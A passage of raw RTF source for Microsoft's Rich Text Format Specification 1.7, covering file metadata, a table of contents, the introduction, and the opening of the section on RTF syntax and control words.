\listoverridecount1{\lfolevel\listoverrideformat{\listlevel\levelnfc23\leveljc0\levelfollow0\levelstartat1\levelold\levelspace0\levelindent360{\leveltext\'01\u-3913 _;}{\levelnumbers;}\f3\fbias0 \fi-360\li720 }}\ls2}{\listoverride\listid381372897
\listoverridecount0\ls3}{\listoverride\listid381372897\listoverridecount1{\lfolevel\listoverrideformat{\listlevel\levelnfc0\leveljc0\levelfollow0\levelstartat2\levelold\levelspace0\levelindent360{\leveltext\'02\'00.;}{\levelnumbers\'01;}\fi-360\li360 }}
\ls4}{\listoverride\listid381372897\listoverridecount1{\lfolevel\listoverrideformat{\listlevel\levelnfc0\leveljc0\levelfollow0\levelstartat3\levelold\levelspace0\levelindent360{\leveltext\'02\'00.;}{\levelnumbers\'01;}\fi-360\li360 }}\ls5}
{\listoverride\listid-2\listoverridecount1{\lfolevel\listoverrideformat{\listlevel\levelnfc23\leveljc0\levelfollow0\levelstartat1\levelold\levelspace0\levelindent288{\leveltext\'01\u-3913 _;}{\levelnumbers;}\f3\fbias0 \fi-288\li288 }}\ls6}
{\listoverride\listid205264908\listoverridecount0\ls7}{\listoverride\listid-119\listoverridecount0\ls8}{\listoverride\listid1176193685\listoverridecount0\ls9}{\listoverride\listid-120\listoverridecount0\ls10}{\listoverride\listid-132
\listoverridecount0\ls11}{\listoverride\listid-131\listoverridecount0\ls12}{\listoverride\listid-130\listoverridecount0\ls13}{\listoverride\listid-128\listoverridecount0\ls14}{\listoverride\listid-127\listoverridecount0\ls15}{\listoverride\listid-126
\listoverridecount0\ls16}{\listoverride\listid-125\listoverridecount0\ls17}{\listoverride\listid-129\listoverridecount0\ls18}{\listoverride\listid-2\listoverridecount1{\lfolevel\listoverrideformat{\listlevel\levelnfc23\leveljc0\levelfollow0\levelstartat1
\levelold\levelspace0\levelindent360{\leveltext\'01\u-3913 _;}{\levelnumbers;}\f3\fbias0 \fi-360\li1440 }}\ls19}{\listoverride\listid2136293396\listoverridecount0\ls20}{\listoverride\listid1176193685\listoverridecount1{\lfolevel\listoverridestartat
\levelstartat0}\ls21}{\listoverride\listid1914731812\listoverridecount0\ls22}}{\*\revtbl {Unknown;}}{\info{\title Rich Text Format (RTF) Specification 1.6}{\author Microsoft Corporation}{\operator DuBois}{\creatim\yr2003\mo2\dy26\hr19\min22}
{\revtim\yr2003\mo2\dy26\hr19\min44}{\printim\yr2003\mo2\dy26\hr19\min43}{\version3}{\edmins4}{\nofpages220}{\nofwords66580}{\nofchars379511}{\nofcharsws466066}{\vern115}}{\*\userprops {\propname _AdHocReviewCycleID}\proptype3{\staticval 1261085355}
{\propname _EmailSubject}\proptype30{\staticval Can you make a code signed EXE out of this?}{\propname _AuthorEmail}\proptype30{\staticval jpbagel@microsoft.com}{\propname _AuthorEmailDisplayName}\proptype30{\staticval Jean Philippe Bagel}
{\propname _PreviousAdHocReviewCycleID}\proptype3{\staticval 243985967}}\margl1080\margr1080\margb1080 \widowctrl\ftnbj\aenddoc\aftnnar\noextrasprl\prcolbl\lytprtmet\hyphcaps0\viewkind1\viewscale100\pgbrdrhead\pgbrdrfoot \fet0\sectd
\psz1\pgnrestart\linex0\footery360\endnhere\titlepg\sectdefaultcl {\header \pard\plain \s23\sa120\widctlpar\brdrb\brdrs\brdrw15\brsp20 \tqr\tx10080\adjustright \f1\fs20\cgrid {\b\i Rich Text Format (RTF) Specification}{\tab Page }{\field{\*\fldinst {page
}}{\fldrslt {\lang1024 220}}}{
\par }\pard\plain \sa120\nowidctlpar\adjustright \f1\fs20\cgrid {
\par }}{\footer \trowd \trqc\trgaph108\trleft-108\trkeep \clvertalt\clbrdrt\brdrs\brdrw15 \cltxlrtb \cellx9972\pard\plain \s22\qc\sa120\widctlpar\intbl\tqc\tx4320\tqr\tx8640\adjustright \f1\fs16\cgrid {Microsoft Product Support Services\cell }\pard\plain
\widctlpar\intbl\adjustright \f1\fs20\cgrid {\fs16 \row }\pard\plain \s22\sa120\widctlpar\tqc\tx4320\tqr\tx8640\adjustright \f1\fs16\cgrid {\fs20
\par }}{\footerf \trowd \trqc\trgaph108\trleft-108\trkeep \clvertalt\clbrdrt\brdrs\brdrw15 \cltxlrtb \cellx9972\pard\plain \s22\qc\sa120\widctlpar\intbl\tqc\tx4320\tqr\tx8640\adjustright \f1\fs16\cgrid {Microsoft Technical Support\cell }\pard\plain
\widctlpar\intbl\adjustright \f1\fs20\cgrid {\row }\pard\plain \s22\sa120\widctlpar\tqc\tx4320\tqr\tx8640\adjustright \f1\fs16\cgrid {\fs20
\par }}{\*\pnseclvl1\pnucrm\pnstart1\pnindent720\pnhang{\pntxta .}}{\*\pnseclvl2\pnucltr\pnstart1\pnindent720\pnhang{\pntxta .}}{\*\pnseclvl3\pndec\pnstart1\pnindent720\pnhang{\pntxta .}}{\*\pnseclvl4\pnlcltr\pnstart1\pnindent720\pnhang{\pntxta )}}
{\*\pnseclvl5\pndec\pnstart1\pnindent720\pnhang{\pntxtb (}{\pntxta )}}{\*\pnseclvl6\pnlcltr\pnstart1\pnindent720\pnhang{\pntxtb (}{\pntxta )}}{\*\pnseclvl7\pnlcrm\pnstart1\pnindent720\pnhang{\pntxtb (}{\pntxta )}}{\*\pnseclvl8
\pnlcltr\pnstart1\pnindent720\pnhang{\pntxtb (}{\pntxta )}}{\*\pnseclvl9\pnlcrm\pnstart1\pnindent720\pnhang{\pntxtb (}{\pntxta )}}\trowd \trleft-8\trkeep \clvertalt\clbrdrt\brdrs\brdrw30 \cltxlrtb \cellx7192\clvertalt\clbrdrt\brdrs\brdrw30 \cltxlrtb
\cellx10072\pard\plain \sa120\widctlpar\intbl\adjustright \f1\fs20\cgrid {\b\fs32 {\*\bkmkstart Rich_Text_Format_Specification}{\*\bkmkend Rich_Text_Format_Specification}Microsoft}{\b\fs16 \u174\'a8}{\b\fs32 MS-DOS}{\b\fs16 \u174\'a8}{\b\fs32 , Windows}{
\b\fs16 \u174\'a8}{\b\fs32 , Windows NT}{\b\fs16 \u174\'a8}{\b\fs32 , and Apple Macintosh Applications\cell }\pard\plain \s39\qc\sb120\sa120\sl240\slmult0\widctlpar\intbl\tqr\tx9936\adjustright \f1\fs20\cgrid {\fs16\up32 \u174\'a8}{\cell }\pard\plain
\widctlpar\intbl\adjustright \f1\fs20\cgrid {\row }\trowd \trleft-8\trkeep \clvertalt\cltxlrtb \cellx1432\clvertalt\cltxlrtb \cellx7192\clvertalt\cltxlrtb \cellx10072\pard\plain \s23\sa120\widctlpar\intbl\tqr\tx9936\adjustright \f1\fs20\cgrid {\fs24
Version:\cell }\pard\plain \sa120\widctlpar\intbl\adjustright \f1\fs20\cgrid {\fs24 RTF Version 1.7}{\cf6 \cell }\pard\plain \s23\qc\sb120\sa120\widctlpar\intbl\tqr\tx9936\adjustright \f1\fs20\cgrid {\fs24 Microsoft Technical Support\cell }\pard\plain
\widctlpar\intbl\adjustright \f1\fs20\cgrid {\row }\trowd \trrh402\trleft-8\trkeep \clvertalt\cltxlrtb \cellx1432\clvertalt\cltxlrtb \cellx7192\clvertalt\cltxlrtb \cellx10072\pard\plain \s23\sb60\sa120\widctlpar\intbl\tqr\tx9936\adjustright
\f1\fs20\cgrid {\fs24 Subject:\cell }\pard\plain \sa120\sl168\slmult0\widctlpar\intbl\adjustright \f1\fs20\cgrid {\b\fs28 Rich Text Format (RTF) Specification }{\cell }\pard \qc\sa120\widctlpar\intbl\adjustright {\fs24 Specification}{\cell }\pard
\widctlpar\intbl\adjustright {\row }\trowd \trrh312\trleft-8\trkeep \clvertalt\clbrdrb\brdrs\brdrw30 \cltxlrtb \cellx1432\clvertalt\clbrdrb\brdrs\brdrw30 \cltxlrtb \cellx7192\clvertalt\clbrdrb\brdrs\brdrw30 \cltxlrtb \cellx10072\pard\plain
\s38\sb120\sa120\widctlpar\intbl\tqr\tx9936\adjustright \f1\fs20\cgrid {Contents:\cell }{\field{\*\fldinst { NUMPAGES \\* MERGEFORMAT }}{\fldrslt {\lang1024 220}}}{\lang1036 Pages}{\cf6\lang1036 \cell }\pard\plain \qc\sa120\widctlpar\intbl\adjustright
\f1\fs20\cgrid {\fs16 8/2001\endash Word 2002 RTF Specification\cell }\pard \widctlpar\intbl\adjustright {\row }\pard \sa120\widctlpar\tx900\adjustright {
\par }\pard\plain \s21\sa40\nowidctlpar\tqr\tldot\tx10080\adjustright \f1\fs20\cgrid {\field\fldedit{\*\fldinst { TOC \\o "1-3" }}{\fldrslt {\lang1024 Introduction\tab 3}{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909675 \\h }}{\fldrslt {\lang1024 3}}}{
\f0\fs24\lang1024
\par }{\lang1024 RTF Syntax\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909676 \\h }}{\fldrslt {\lang1024 3}}}{\f0\fs24\lang1024
\par }{\lang1024 Conventions of an RTF Reader\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909677 \\h }}{\fldrslt {\lang1024 5}}}{\f0\fs24\lang1024
\par }{\lang1024 Formal Syntax\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909678 \\h }}{\fldrslt {\lang1024 6}}}{\f0\fs24\lang1024
\par }{\lang1024 Contents of an RTF File\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909679 \\h }}{\fldrslt {\lang1024 7}}}{\f0\fs24\lang1024
\par }\pard\plain \s20\li432\sa40\nowidctlpar\tqr\tldot\tx10080\adjustright \f1\fs20\cgrid {\lang1024 Header\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909680 \\h }}{\fldrslt {\lang1024 7}}}{\f0\fs24\lang1024
\par }\pard\plain \s19\li864\sa40\nowidctlpar\tqr\tldot\tx10080\adjustright \f1\fs20\cgrid {\lang1024 RTF Version\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909681 \\h }}{\fldrslt {\lang1024 8}}}{\f0\fs24\lang1024
\par }{\lang1024 Character Set\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909682 \\h }}{\fldrslt {\lang1024 8}}}{\f0\fs24\lang1024
\par }{\lang1024 Unicode RTF\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909683 \\h }}{\fldrslt {\lang1024 8}}}{\f0\fs24\lang1024
\par }{\lang1024 Default Fonts\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909684 \\h }}{\fldrslt {\lang1024 11}}}{\f0\fs24\lang1024
\par }{\lang1024 Font Table\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909685 \\h }}{\fldrslt {\lang1024 11}}}{\f0\fs24\lang1024
\par }{\lang1024 File Table\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909686 \\h }}{\fldrslt {\lang1024 15}}}{\f0\fs24\lang1024
\par }{\lang1024 Color Table\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909687 \\h }}{\fldrslt {\lang1024 16}}}{\f0\fs24\lang1024
\par }{\lang1024 Style Sheet\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909688 \\h }}{\fldrslt {\lang1024 17}}}{\f0\fs24\lang1024
\par }{\lang1024 List Tables\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909689 \\h }}{\fldrslt {\lang1024 21}}}{\f0\fs24\lang1024
\par }{\lang1024 Paragraph Group Properties\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909690 \\h }}{\fldrslt {\lang1024 26}}}{\f0\fs24\lang1024
\par }{\lang1024 Track Changes (Revision Marks)\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909691 \\h }}{\fldrslt {\lang1024 26}}}{\f0\fs24\lang1024
\par }{\lang1024 Generator\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909692 \\h }}{\fldrslt {\lang1024 28}}}{\f0\fs24\lang1024
\par }\pard\plain \s20\li432\sa40\nowidctlpar\tqr\tldot\tx10080\adjustright \f1\fs20\cgrid {\lang1024 Document Area\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909693 \\h }}{\fldrslt {\lang1024 28}}}{\f0\fs24\lang1024
\par }\pard\plain \s19\li864\sa40\nowidctlpar\tqr\tldot\tx10080\adjustright \f1\fs20\cgrid {\lang1024 Information Group\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909694 \\h }}{\fldrslt {\lang1024 28}}}{\f0\fs24\lang1024
\par }{\lang1024 Document Formatting Properties\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909695 \\h }}{\fldrslt {\lang1024 31}}}{\f0\fs24\lang1024
\par }{\lang1024 Section Text\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909696 \\h }}{\fldrslt {\lang1024 39}}}{\f0\fs24\lang1024
\par }{\lang1024 Paragraph Text\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909697 \\h }}{\fldrslt {\lang1024 45}}}{\f0\fs24\lang1024
\par }{\lang1024 Character Text\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909698 \\h }}{\fldrslt {\lang1024 75}}}{\f0\fs24\lang1024
\par }{\lang1024 Document Variables\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909699 \\h }}{\fldrslt {\lang1024 87}}}{\f0\fs24\lang1024
\par }{\lang1024 Bookmarks\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909700 \\h }}{\fldrslt {\lang1024 88}}}{\f0\fs24\lang1024
\par }{\lang1024 Pictures\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909701 \\h }}{\fldrslt {\lang1024 88}}}{\f0\fs24\lang1024
\par }{\lang1024 Objects\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909702 \\h }}{\fldrslt {\lang1024 92}}}{\f0\fs24\lang1024
\par }{\lang1024 Drawing Objects\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909703 \\h }}{\fldrslt {\lang1024 95}}}{\f0\fs24\lang1024
\par }{\lang1024 Word 97 through Word 2002 RTF for Drawing Objects (Shapes)\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909704 \\h }}{\fldrslt {\lang1024 101}}}{\f0\fs24\lang1024
\par }{\lang1024 Footnotes\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909705 \\h }}{\fldrslt {\lang1024 127}}}{\f0\fs24\lang1024
\par }{\lang1024 Comments (Annotations)\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909706 \\h }}{\fldrslt {\lang1024 127}}}{\f0\fs24\lang1024
\par }{\lang1024 Fields\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909707 \\h }}{\fldrslt {\lang1024 128}}}{\f0\fs24\lang1024
\par }{\lang1024 Form Fields\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909708 \\h }}{\fldrslt {\lang1024 129}}}{\f0\fs24\lang1024
\par }{\lang1024 Index Entries\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909709 \\h }}{\fldrslt {\lang1024 130}}}{\f0\fs24\lang1024
\par }{\lang1024 Table of Contents Entries\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909710 \\h }}{\fldrslt {\lang1024 131}}}{\f0\fs24\lang1024
\par }{\lang1024 Bidirectional Language Support\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909711 \\h }}{\fldrslt {\lang1024 131}}}{\f0\fs24\lang1024
\par }\pard\plain \s21\sa40\nowidctlpar\tqr\tldot\tx10080\adjustright \f1\fs20\cgrid {\lang1024 Far East Support\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909712 \\h }}{\fldrslt {\lang1024 133}}}{\f0\fs24\lang1024
\par }\pard\plain \s20\li432\sa40\nowidctlpar\tqr\tldot\tx10080\adjustright \f1\fs20\cgrid {\lang1024 Escaped Expressions\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909713 \\h }}{\fldrslt {\lang1024 133}}}{\f0\fs24\lang1024
\par }{\lang1024 Character Set\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909714 \\h }}{\fldrslt {\lang1024 134}}}{\f0\fs24\lang1024
\par }{\lang1024 Character Mapping\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909715 \\h }}{\fldrslt {\lang1024 134}}}{\f0\fs24\lang1024
\par }{\lang1024 Font Family\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909716 \\h }}{\fldrslt {\lang1024 134}}}{\f0\fs24\lang1024
\par }\pard\plain \s19\li864\sa40\nowidctlpar\tqr\tldot\tx10080\adjustright \f1\fs20\cgrid {\lang1024 Composite Fonts (Associated Fonts for International Runs)\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909717 \\h }}{\fldrslt {\lang1024 134}}}{
\f0\fs24\lang1024
\par }{\lang1024 New Far East Control Words Created by Word 6J\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909718 \\h }}{\fldrslt {\lang1024 135}}}{\f0\fs24\lang1024
\par }{\lang1024 New Far East Control Words Created by Asian Versions of Word 97\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909719 \\h }}{\fldrslt {\lang1024 138}}}{\f0\fs24\lang1024
\par }{\lang1024 New Far East Control Words Created by Word 2000\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909720 \\h }}{\fldrslt {\lang1024 141}}}{\f0\fs24\lang1024
\par }\pard\plain \s21\sa40\nowidctlpar\tqr\tldot\tx10080\adjustright \f1\fs20\cgrid {\lang1024 Appendix A: Sample RTF Reader Application\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909721 \\h }}{\fldrslt {\lang1024 142}}}{\f0\fs24\lang1024
\par }\pard\plain \s20\li432\sa40\nowidctlpar\tqr\tldot\tx10080\adjustright \f1\fs20\cgrid {\lang1024 How to Write an RTF Reader\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909722 \\h }}{\fldrslt {\lang1024 142}}}{\f0\fs24\lang1024
\par }{\lang1024 A Sample RTF Reader Implementation\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909723 \\h }}{\fldrslt {\lang1024 143}}}{\f0\fs24\lang1024
\par }\pard\plain \s19\li864\sa40\nowidctlpar\tqr\tldot\tx10080\adjustright \f1\fs20\cgrid {\lang1024 Rtfdecl.h and Rtfreadr.c\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909724 \\h }}{\fldrslt {\lang1024 143}}}{\f0\fs24\lang1024
\par }{\lang1024 Rtftype.h\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909725 \\h }}{\fldrslt {\lang1024 143}}}{\f0\fs24\lang1024
\par }{\lang1024 Rtfactn.c\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909726 \\h }}{\fldrslt {\lang1024 145}}}{\f0\fs24\lang1024
\par }\pard\plain \s20\li432\sa40\nowidctlpar\tqr\tldot\tx10080\adjustright \f1\fs20\cgrid {\lang1024 Notes on Implementing Other RTF Features\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909727 \\h }}{\fldrslt {\lang1024 146}}}{\f0\fs24\lang1024
\par }\pard\plain \s19\li864\sa40\nowidctlpar\tqr\tldot\tx10080\adjustright \f1\fs20\cgrid {\lang1024 Tabs and Other Control Sequences Terminating in a Fixed Control\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909728 \\h }}{\fldrslt {\lang1024 146}}}{
\f0\fs24\lang1024
\par }{\lang1024 Borders and Other Control Sequences Beginning with a Fixed Control\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909729 \\h }}{\fldrslt {\lang1024 146}}}{\f0\fs24\lang1024
\par }\pard\plain \s20\li432\sa40\nowidctlpar\tqr\tldot\tx10080\adjustright \f1\fs20\cgrid {\lang1024 Other Problem Areas in RTF\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909730 \\h }}{\fldrslt {\lang1024 146}}}{\f0\fs24\lang1024
\par }\pard\plain \s19\li864\sa40\nowidctlpar\tqr\tldot\tx10080\adjustright \f1\fs20\cgrid {\lang1024 Style Sheets\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909731 \\h }}{\fldrslt {\lang1024 146}}}{\f0\fs24\lang1024
\par }{\lang1024 Property Changes\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909732 \\h }}{\fldrslt {\lang1024 146}}}{\f0\fs24\lang1024
\par }{\lang1024 Fields\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909733 \\h }}{\fldrslt {\lang1024 147}}}{\f0\fs24\lang1024
\par }{\lang1024 Tables\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909734 \\h }}{\fldrslt {\lang1024 147}}}{\f0\fs24\lang1024
\par }{\lang1024 Rtfdecl.h\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909735 \\h }}{\fldrslt {\lang1024 148}}}{\f0\fs24\lang1024
\par }{\lang1024 Rtftype.h\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909736 \\h }}{\fldrslt {\lang1024 149}}}{\f0\fs24\lang1024
\par }{\lang1024 Rtfreadr.c\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909737 \\h }}{\fldrslt {\lang1024 152}}}{\f0\fs24\lang1024
\par }{\lang1024 Makefile\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909738 \\h }}{\fldrslt {\lang1024 166}}}{\f0\fs24\lang1024
\par }\pard\plain \s21\sa40\nowidctlpar\tqr\tldot\tx10080\adjustright \f1\fs20\cgrid {\lang1024 Appendix B: Index of RTF Control Words\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909739 \\h }}{\fldrslt {\lang1024 167}}}{\f0\fs24\lang1024
\par }\pard\plain \s20\li432\sa40\nowidctlpar\tqr\tldot\tx10080\adjustright \f1\fs20\cgrid {\lang1024 Special Characters and A\endash B\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909740 \\h }}{\fldrslt {\lang1024 167}}}{\f0\fs24\lang1024
\par }{\lang1024 C\endash E\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909741 \\h }}{\fldrslt {\lang1024 173}}}{\f0\fs24\lang1024
\par }{\lang1024 F\endash L\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909742 \\h }}{\fldrslt {\lang1024 182}}}{\f0\fs24\lang1024
\par }{\lang1024 M\endash O\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909743 \\h }}{\fldrslt {\lang1024 191}}}{\f0\fs24\lang1024
\par }{\lang1024 P\endash R\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909744 \\h }}{\fldrslt {\lang1024 195}}}{\f0\fs24\lang1024
\par }{\lang1024 S\endash T\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909745 \\h }}{\fldrslt {\lang1024 204}}}{\f0\fs24\lang1024
\par }{\lang1024 U\endash Z\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909746 \\h }}{\fldrslt {\lang1024 216}}}{\f0\fs24\lang1024
\par }\pard\plain \s21\sa40\nowidctlpar\tqr\tldot\tx10080\adjustright \f1\fs20\cgrid {\lang1024 Appendix C: Control Words Introduced by Other Microsoft Products.\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909747 \\h }}{\fldrslt {\lang1024 219}}}{
\f0\fs24\lang1024
\par }\pard\plain \s20\li432\sa40\nowidctlpar\tqr\tldot\tx10080\adjustright \f1\fs20\cgrid {\lang1024 Pocket Word\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909748 \\h }}{\fldrslt {\lang1024 219}}}{\f0\fs24\lang1024
\par }{\lang1024 Exchange (Used in RTF<->HTML Conversions)\tab }{\field{\*\fldinst {\lang1024 PAGEREF _Toc521909749 \\h }}{\fldrslt {\lang1024 219}}}{\f0\fs24\lang1024
\par }\pard\plain \sa120\widctlpar\tx900\adjustright \f1\fs20\cgrid }}\pard\plain \sa120\widctlpar\tx900\adjustright \f1\fs20\cgrid {
\par }\pard \sa120\widctlpar\adjustright {\page
\par }\pard\plain \s1\sb240\sa240\keepn\widctlpar\outlinelevel0\adjustright \b\caps\f1\fs32\cgrid {{\*\bkmkstart _Introduction}{\*\bkmkstart _Toc382644177}{\*\bkmkstart _Toc383176008}{\*\bkmkstart _Toc386002166}{\*\bkmkstart _Toc386539797}
{\*\bkmkstart INTRODUCTION}{\*\bkmkstart _Toc519492432}{\*\bkmkstart _Toc521909675}{\*\bkmkend _Introduction}Introduction{\*\bkmkend _Toc382644177}{\*\bkmkend _Toc383176008}{\*\bkmkend _Toc386002166}{\*\bkmkend _Toc386539797}{\*\bkmkend INTRODUCTION}
{\*\bkmkend _Toc519492432}{\*\bkmkend _Toc521909675}
\par }\pard\plain \sa120\widctlpar\adjustright \f1\fs20\cgrid {
The Rich Text Format (RTF) Specification is a method of encoding formatted text and graphics for easy transfer between applications. Currently, users depend on special translation software to move word-processing documents between different MS-DOS}{\fs12
\u174\'a8}{, Microsoft}{\sub \u174\'a8}{ Windows}{\sub \u174\'a8}{, OS/2, Macintosh, and Power Macintosh applications.
\par The RTF Specification provides a format for text and graphics interchange that can be used with different output devices, operating environments, and
operating systems. RTF uses the ANSI, PC-8, Macintosh, or IBM PC character set to control the representation and formatting of a document, both on the screen and in print. With the RTF Specification, documents created under different operating systems and
with different software applications can be transferred between those operating systems and applications. RTF files created in Microsoft Word 6.0 (and later) for the Macintosh and Power Macintosh have a file type of \ldblquote RTF.\rdblquote
\par Software that takes a formatted f
ile and turns it into an RTF file is called an RTF writer. An RTF writer separates the application's control information from the actual text and writes a new file containing the text and the RTF groups associated with that text. Software that translates
an RTF file into a formatted file is called an RTF reader.
\par A sample RTF reader application is available (see }{\field\fldedit{\*\fldinst { HYPERLINK \\l "APPENDIX_A_SAMPLE_RTF_READER" }{{\*\datafield
08d0c9ea79f9bace118c8200aa004ba90b02000000080000001d00000041005000500045004e004400490058005f0041005f00530041004d0050004c0045005f005200540046005f00520045004100440045005200000000}}}{\fldrslt {\cs110\ul\cf2 Appendix A: Sample RTF Reader Application}}}{
). It is designed for use with the specification to assist those interested in developing their own RTF readers. This application and its use are described in }{\field\fldedit{\*\fldinst { HYPERLINK \\l "APPENDIX_A_SAMPLE_RTF_READER" }{{\*\datafield
08d0c9ea79f9bace118c8200aa004ba90b02000000080000001d00000041005000500045004e004400490058005f0041005f00530041004d0050004c0045005f005200540046005f00520045004100440045005200000000}}}{\fldrslt {\cs110\ul\cf2 Appendix A}}}{
. The sample RTF reader is not a for-sale product, and Microsoft does not provide technical or any other type of support for the sample RTF reader code or the RTF specification.
\par RTF version 1.7 includes all new control words introduced by Microsoft Word for Windows 95 version 7.0, Word 97 for Windows, Word 98 for the Macintosh, Word 2000 for Windows, and Word 2002 for Windows}{\cf6 , }{as well as other Microsoft products.
\par }\pard\plain \s1\sb240\sa240\keepn\widctlpar\outlinelevel0\adjustright \b\caps\f1\fs32\cgrid {{\*\bkmkstart _Toc313960795}{\*\bkmkstart _Toc335399069}{\*\bkmkstart _Toc380819766}{\*\bkmkstart _Toc381591817}{\*\bkmkstart _Toc382644178}
{\*\bkmkstart _Toc383176009}{\*\bkmkstart _Toc386002167}{\*\bkmkstart _Toc386539798}{\*\bkmkstart RTF_SYNTAX}{\*\bkmkstart _Toc519492433}{\*\bkmkstart _Toc521909676}RTF Syntax{\*\bkmkend _Toc313960795}{\*\bkmkend _Toc335399069}{\*\bkmkend _Toc380819766}
{\*\bkmkend _Toc381591817}{\*\bkmkend _Toc382644178}{\*\bkmkend _Toc383176009}{\*\bkmkend _Toc386002167}{\*\bkmkend _Toc386539798}{\*\bkmkend RTF_SYNTAX}{\*\bkmkend _Toc519492433}{\*\bkmkend _Toc521909676}
\par }\pard\plain \sa120\widctlpar\adjustright \f1\fs20\cgrid {An RTF file consists of unformatted text, control words, control symbols, and groups. For ease of transport, a standard RTF file can consist of only 7-bit ASCII characters. (Conv
erters that communicate with Microsoft Word for Windows or Microsoft Word for the Macintosh should expect 8-bit characters.) There is no set maximum line length for an RTF file.
\par A }{\i control word}{ is a specially formatted command that RTF uses to mark printer control codes and information that applications use to manage documents. A control word cannot be longer than 32 characters. A control word takes the following form:
\par }\pard\plain \s15\li288\sa120\widctlpar\adjustright \f1\fs20\cgrid {\\LetterSequence}{\i <}{Delimiter}{\i >}{
\par }\pard\plain \sa120\widctlpar\adjustright \f1\fs20\cgrid {Note that a backslash begins each control word.
\par The LetterSequence is made up of lowercase alphabetic characters (a through z). RTF is case sensitive. Control words (also known as Keywords) may not contain any uppercase alphabetic characters.
\par The following keywords }{\cf1 found in Word 97 through Word 2002}{ do not currently f
ollow the requirement that keywords may not contain any uppercase alphabetic characters. All writers should still follow this rule, and Word will also emit completely lowercase versions of all these keywords in the next version. In the meantime, those imp
lementing readers are advised to treat them as exceptions.
\par {\listtext\pard\plain\f3\fs20 \loch\af3\dbch\af0\hich\f3 \u-3913\'b7\tab}}\pard \fi-144\li144\sa120\nowidctlpar\jclisttab\tx360\ls22\adjustright {\b \\clFitText
\par {\listtext\pard\plain\s21 \f3\fs20 \loch\af3\dbch\af0\hich\f3 \u-3913\'b7\tab}}\pard\plain \s21\fi-144\li144\sa120\nowidctlpar\jclisttab\tx360\tx720\tqr\tldot\tx10080\ls22\adjustright \f1\fs20\cgrid {\b \\clftsWidth}{\b\i N}{\b
